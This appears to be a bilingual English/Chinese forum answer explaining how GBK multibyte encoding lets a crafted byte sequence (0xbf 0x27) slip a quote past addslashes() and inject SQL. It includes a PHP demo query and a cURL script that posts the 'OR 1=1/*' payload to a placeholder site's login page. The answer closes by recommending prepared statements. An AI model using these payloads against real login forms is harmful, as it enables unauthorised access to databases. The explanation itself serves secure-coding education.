Well, here's the article you want.

嗯，这里有你想要的文章。

Basically, the way the attack works is by getting addslashes()to put a backslash in the middle of a multibyte character such that the backslash loses its meaning by being part of a valid multibyte sequence.

基本上，攻击的工作方式是addslashes()在多字节字符的中间放置一个反斜杠，这样反斜杠就失去了作为有效多字节序列的一部分的意义。

The general caveat from the article:

文章中的一般警告：

This type of attack is possible with any character encoding where there is a valid multi-byte character that ends in 0x5c, because addslashes()can be tricked into creating a valid multi-byte character instead of escaping the single quote that follows. UTF-8 does not fit this description.

这种类型的攻击对于任何以 结尾的有效多字节字符的字符编码都是可能的0x5c，因为 addslashes()可以被欺骗以创建有效的多字节字符而不是转义后面的单引号。UTF-8 不符合此描述。

Chris Shiflettclearly explains with the bellow example, That will of-course work if you try it when using GBK encoding in your database. Even I tried it, this proves, there are chances for sql injection, even though they are very less, but someone with good knowledge and capability can easily inject. Here is an Example...

Chris Shiflett用下面的例子清楚地解释了，如果你在数据库中使用 GBK 编码时尝试它，那当然会起作用。连我都试过了，这证明，sql注入是有机会的，虽然很少，但是有知识有能力的人可以轻松注入。这是一个例子...

<?php 

       $mysql = array();
       $db = mysqli_init();
       $db->real_connect('localhost', 'myuser', 'mypass', 'mydb');

       /* SQL Injection Example */

       $_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username /*';
       $_POST['password'] = 'guess';

       $mysql['username'] = addslashes($_POST['username']);
       $mysql['password'] = addslashes($_POST['password']);

       $sql = "SELECT * FROM   users
               WHERE username = '{$mysql['username']}'
               AND password = '{$mysql['password']}'";

       $result = $db->query($sql);

       if ($result->num_rows) {
              /* Success */
       } else {
              /* Failure */
       }

?>

Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection, I hope this will help you a bit more to understand:

尽管使用addslashes() 或magic_quotes_gpc 通常被认为有些安全，但使用GBK 会使它们几乎无用。下面的 PHP cURL 脚本将能够使用注入，我希望这能帮助您更多地理解：

<?php

       $url     = "http://www.victimsite.com/login.php";
       $ref     = "http://www.victimsite.com/index.php";
       $session = "PHPSESSID=abcdef01234567890abcdef01";

       $ch      = curl_init();

       curl_setopt( $ch, CURLOPT_URL,            $url     );
       curl_setopt( $ch, CURLOPT_REFERER,        $ref     );
       curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE     );
       curl_setopt( $ch, CURLOPT_COOKIE,         $session );
       curl_setopt( $ch, CURLOPT_POST,           TRUE     );
       curl_setopt( $ch, CURLOPT_POSTFIELDS,     "username=" . chr(0xbf) . chr(0x27) .
                                                 "OR 1=1/*&submit=1" );

       $data = curl_exec( $ch );

       print( $data );
       curl_close( $ch );
 ?>

As an addition for the readers of the answers here: This MySQL bug has already been fixed:)

作为这里答案的读者的补充：此 MySQL 错误已被修复:)

Also, it is always good practice to use prepared statements. It is the most exploit-free way you can fire queries (and, in several use cases the most performant). And it would have saved you from this flaw.

此外，使用准备好的语句始终是一个好习惯。这是您可以触发查询的最无漏洞利用的方式（并且在几个用例中性能最高）。它会让你免于这个缺陷。

mysql_real_escape_string() versus Prepared Statementsclearly explains mysql_real_escape_string() isn't 100% secure.

mysql_real_escape_string() 与 Prepared Statements清楚地解释了mysql_real_escape_string() 不是 100% 安全。

using mysql_set_charset('GBK')to replace mysql_query("SET CHARACTER SET 'GBK'"), the mysql_real_escape_string() can be 100% secure.

使用mysql_set_charset('GBK')替换mysql_query("SET CHARACTER SET 'GBK'")，mysql_real_escape_string() 可以 100% 安全。